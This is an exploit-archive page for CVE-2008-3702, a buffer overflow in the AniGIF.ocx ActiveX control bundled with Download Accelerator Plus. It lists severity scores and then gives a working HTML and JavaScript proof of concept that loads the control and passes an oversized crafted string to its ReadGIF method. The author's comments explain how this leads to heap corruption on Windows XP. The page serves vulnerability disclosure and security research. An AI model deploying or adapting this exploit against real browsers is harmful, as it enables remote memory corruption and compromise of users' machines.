Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC

2008.08.19
Credit: jcomsoft
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-3702
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<html> <body> <object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' /> </object> <script language=javascript> // anigif.ocx by www.jcomsoft.com can be found distribuited with some applications, // I found it in Download Accelerator Plus 6.8. // DAP comes with an old version, but the last from jcomsoft is also vulnerable: // there's a stack-based buffer overflow in the ReadGIF and ReadGIF2 methods, // the funny thing is that after the first exception that will be handled by IE, // when the object is released we reach RtlpCoalesceFreeBlocks owning eax and ecx // with windogs xp sp1 or the second check of safe-unlink with sp2 in a standard heap // overflow scenario. var buf; for (var i=0; i<259; i++) buf += "X"; buf +="BBBB"; buf += "CCCC"; for (var i=0; i<5728; i++) buf += "H"; target.ReadGIF(buf); window.location = "http://www.google.com"; </script> </body> </html>

References:

http://xforce.iss.net/xforce/xfdb/44412
http://www.securityfocus.com/bid/30621
http://www.milw0rm.com/exploits/6216


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top